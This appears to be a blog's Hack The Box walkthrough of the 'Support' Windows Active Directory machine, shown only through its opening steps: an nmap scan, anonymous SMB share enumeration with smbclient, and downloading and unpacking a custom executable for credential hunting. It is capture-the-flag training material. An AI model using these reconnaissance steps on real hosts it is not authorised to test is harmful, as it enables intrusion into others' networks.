<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Support - Hack The Box" />
<meta property="og:locale" content="en" />
<meta name="description" content="Young cybersecurity enthusiast passionate about offensive security and malware analysis. Always seeking new attack vectors and challenges." />
<meta property="og:description" content="Young cybersecurity enthusiast passionate about offensive security and malware analysis. Always seeking new attack vectors and challenges." />
<link rel="canonical" href="https://x-pwn3d.github.io/posts/Support/" />
<meta property="og:url" content="https://x-pwn3d.github.io/posts/Support/" />
<meta property="og:site_name" content="Pwn3d" />
<meta property="og:image" content="https://x-pwn3d.github.io/assets/img/thumbnails/HTB_Support.png" />
<meta property="og:image:height" content="100" />
<meta property="og:image:width" content="100" />
<meta property="og:image:alt" content="Support - Hack The Box" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-05-01T00:00:00+02:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="https://x-pwn3d.github.io/assets/img/thumbnails/HTB_Support.png" />
<meta name="twitter:image:alt" content="Support - Hack The Box" />
<meta property="twitter:title" content="Support - Hack The Box" />
<meta name="google-site-verification" content="JMIBh9ot0KV6LPAwvuJDi8HkiQqKSK3KmTUgUv2eY4s" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-05-01T00:00:00+02:00","datePublished":"2025-05-01T00:00:00+02:00","description":"Young cybersecurity enthusiast passionate about offensive security and malware analysis. Always seeking new attack vectors and challenges.","headline":"Support - Hack The Box","image":{"alt":"Support - Hack The Box","width":100,"height":100,"url":"https://x-pwn3d.github.io/assets/img/thumbnails/HTB_Support.png","@type":"imageObject"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://x-pwn3d.github.io/posts/Support/"},"url":"https://x-pwn3d.github.io/posts/Support/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Support - Hack The Box | Pwn3d
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Pwn3d">
<meta name="application-name" content="Pwn3d">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/avatar.jpeg" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">Pwn3d</a>
    <p class="site-subtitle fst-italic mb-0">Young cybersecurity enthusiast passionate about offensive security and malware analysis. Always seeking new attack vectors and challenges.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/x-pwn3d"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['contact.pwn3d','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
        <a
          href="/feed.xml"
          aria-label="rss"
          

          

          

          
        >
          <i class="fas fa-rss"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>Support - Hack The Box</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Support - Hack The Box</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1746050400"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  May  1, 2025
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/thumbnails/HTB_Support.png" class="popup img-link preview-img shimmer"><img src="/assets/img/thumbnails/HTB_Support.png"  alt="Support - Hack The Box" width="1200" height="630"  loading="lazy"></a><figcaption class="text-center pt-2 pb-2">Support - Hack The Box</figcaption></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://github.com/x-pwn3d">x-pwn3d</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2107 words"
>
  <em>11 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Support - Hack The Box</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Support - Hack The Box</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <p><a href="https://github.com/user-attachments/assets/3cd4f0a6-ae96-4042-b108-59a2091385f4" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/3cd4f0a6-ae96-4042-b108-59a2091385f4" alt="Capture d'écran 2025-05-01 152458" loading="lazy"></a></p>

<p><strong>Support</strong> is an <strong>easy-level Windows machine</strong> on <strong>Hack The Box (HTB)</strong> that offers a great introduction to <strong>Active Directory exploitation</strong>, focusing on machine account manipulation, delegation abuse, and Kerberos ticket attacks. In this walkthrough, we’ll go from basic enumeration all the way to full <strong>DOMAIN ADMIN</strong> access by taking advantage of a subtle privilege misconfiguration and some clever ticket forging. If you’re new to AD attacks or looking to reinforce your fundamentals, this is a perfect place to start.</p>

<p>Let’s jump in and take over the domain!</p>

<hr />

<h3 id="initial-enumeration"><span class="me-2">Initial enumeration</span><a href="#initial-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>To start, we add the target’s IP address to our <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file and perform a full port scan using <strong>nmap</strong> :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>nmap support.htb -sV -sC -p- -oN nmapres
</pre></td></tr></tbody></table></code></div></div>

<p><a href="https://github.com/user-attachments/assets/a8f35b0d-fb56-4989-a31b-eec9cecf8c2d" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/a8f35b0d-fb56-4989-a31b-eec9cecf8c2d" alt="Capture d'écran 2025-05-01 154316" loading="lazy"></a></p>

<p>The Nmap scan revealed several open ports that are commonly found on a <strong>Windows Active Directory (AD) Domain Controller</strong>, indicating the machine likely plays a central role in a domain-based environment. Below are the most relevant ports for our enumeration :</p>

<p><strong>TCP 53 – DNS (Simple DNS Plus)</strong></p>

<p>This port suggests the machine is running a DNS server, which is typical in AD setups. It could be useful for <strong>zone transfers</strong> or <strong>domain enumeration</strong>.</p>

<p><strong>TCP 88 – Kerberos</strong></p>

<p>Kerberos is the default authentication protocol in Active Directory. This service can be abused in attacks like <strong>AS-REP roasting</strong> or <strong>Kerberoasting</strong>, especially if usernames can be enumerated.</p>

<blockquote>
  <p><em>We’ll revisit this after enumerating users from LDAP or SMB.</em></p>
</blockquote>

<p><strong>TCP 389 – LDAP</strong></p>

<p>LDAP (Lightweight Directory Access Protocol) is critical for querying the domain’s directory services. If <strong>anonymous bind</strong> is allowed, it can provide a <strong>wealth of information</strong> like usernames, group memberships, and machine accounts.</p>

<blockquote>
  <p><em>This is often the first source of user enumeration in an AD environment.</em></p>
</blockquote>

<p><strong>TCP 445 – SMB</strong></p>

<p>Port 445 is used for SMB (file sharing and remote administration). It can allow :</p>

<ul>
  <li>
    <p>Null sessions</p>
  </li>
  <li>
    <p>Enumeration of users, shares, policies</p>
  </li>
  <li>
    <p>Potential for relay attacks (e.g., <strong>NTLM relaying</strong>)</p>
  </li>
</ul>

<blockquote>
  <p><em>We’ll check SMB for anonymous access and enumerate users and shares.</em></p>
</blockquote>

<p><strong>TCP 5985 – WinRM (HTTP)</strong></p>

<p>This port is for <strong>Windows Remote Management</strong> (WinRM), which can allow remote code execution if valid credentials are obtained. This becomes important <strong>post-compromise</strong> once we have a user’s credentials.</p>

<blockquote>
  <p><em>Tool of choice here is <code class="language-plaintext highlighter-rouge">evil-winrm</code> for post-auth access.</em></p>
</blockquote>

<hr />
<h3 id="smb-enumeration--anonymous-access"><span class="me-2">SMB Enumeration – Anonymous access</span><a href="#smb-enumeration--anonymous-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>We can perform a share enumeration using <code class="language-plaintext highlighter-rouge">smbclient</code> with no credentials (<code class="language-plaintext highlighter-rouge">-N</code> flag), and we obtain a list of available shares hosted on the target :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>smbclient -N -L 10.10.11.174
</pre></td></tr></tbody></table></code></div></div>

<p><a href="https://github.com/user-attachments/assets/95dd25f6-3d8a-4041-8fc1-49c0166299ea" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/95dd25f6-3d8a-4041-8fc1-49c0166299ea" alt="Capture d'écran 2025-05-01 160233" loading="lazy"></a></p>

<p>Anonymous login was successful, which indicates that the server allows unauthenticated access to list its SMB shares — a common but risky <strong>misconfiguration</strong> in Active Directory environments.</p>

<blockquote>
  <p>Shares like <code class="language-plaintext highlighter-rouge">NETLOGON</code> and <code class="language-plaintext highlighter-rouge">SYSVOL</code> are default in domain controllers and often contain login scripts, group policies, or other domain-related files. The custom share <code class="language-plaintext highlighter-rouge">support-tools</code> is of particular interest, as it may contain internal tools or sensitive information used by support staff.</p>
</blockquote>

<p>This enumeration provides a solid foothold for further exploration, particularly of readable shares that may expose user information or credentials.</p>

<hr />
<h3 id="exploring-the-support-tools-smb-share"><span class="me-2">Exploring the support-tools SMB Share</span><a href="#exploring-the-support-tools-smb-share" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Using anonymous access, we connected to the <code class="language-plaintext highlighter-rouge">support-tools</code> SMB share and listed its contents:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>smbclient //10.10.11.174/support-tools
</pre></td></tr></tbody></table></code></div></div>

<p>We can perform a directory listing using the <code class="language-plaintext highlighter-rouge">ls</code> command, and we obtain the following files :</p>

<p><a href="https://github.com/user-attachments/assets/6a316b7d-8f69-4456-b13a-6294e8becff1" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/6a316b7d-8f69-4456-b13a-6294e8becff1" alt="Capture d'écran 2025-05-01 161751" loading="lazy"></a></p>

<p>This share appears to contain various portable administrative tools, which may be used by support staff. Among them, the file <code class="language-plaintext highlighter-rouge">UserInfo.exe.zip</code> stands out due to its custom name, suggesting it may be an internally developed utility.</p>

<blockquote>
  <p>We can perform a download of this file using the <code class="language-plaintext highlighter-rouge">get</code> command, and we obtain a ZIP archive that likely contains a custom executable :</p>
</blockquote>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>get UserInfo.exe.zip
</pre></td></tr></tbody></table></code></div></div>

<p>This file will be analyzed next to identify its purpose and determine whether it exposes sensitive information (such as usernames, domain details, or credentials).</p>

<hr />

<h3 id="extracting-and-reviewing-userinfoexezip"><span class="me-2">Extracting and reviewing <code class="language-plaintext highlighter-rouge">UserInfo.exe.zip</code></span><a href="#extracting-and-reviewing-userinfoexezip" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>After downloading the archive from the <code class="language-plaintext highlighter-rouge">support-tools</code> share, we can perform extraction using the <code class="language-plaintext highlighter-rouge">unzip</code> command, and we obtain the following files :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>unzip UserInfo.exe.zip -d userinfo_extracted
</pre></td></tr></tbody></table></code></div></div>

<p>This gives us an executable (<code class="language-plaintext highlighter-rouge">UserInfo.exe</code>) along with several .NET-related DLL dependencies and a configuration file :</p>

<p><a href="https://github.com/user-attachments/assets/e3432348-c76d-4d5a-9b67-8b318fbdd6e4" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/e3432348-c76d-4d5a-9b67-8b318fbdd6e4" alt="Capture d'écran 2025-05-01 162742" loading="lazy"></a></p>

<p>We first examined the <code class="language-plaintext highlighter-rouge">UserInfo.exe.config</code> file for any sensitive information such as hardcoded credentials, internal IPs, or environment settings.</p>

<blockquote>
  <p>However, the configuration file did not contain any useful information. It appeared to be a default .NET config file with no custom entries.</p>
</blockquote>

<p>Given this, we proceeded to analyze the main binary itself  (<code class="language-plaintext highlighter-rouge">UserInfo.exe</code>) to better understand its purpose and identify any sensitive output or functionality that could be leveraged.</p>

<hr />

<h3 id="enumeration-of-hardcoded-credentials-in-userinfoexe"><span class="me-2">Enumeration of hardcoded credentials in <code class="language-plaintext highlighter-rouge">UserInfo.exe</code></span><a href="#enumeration-of-hardcoded-credentials-in-userinfoexe" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>The <code class="language-plaintext highlighter-rouge">UserInfo.exe</code> file is a 32-bit .NET executable, as confirmed by the following command:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>file UserInfo.exe
</pre></td></tr></tbody></table></code></div></div>
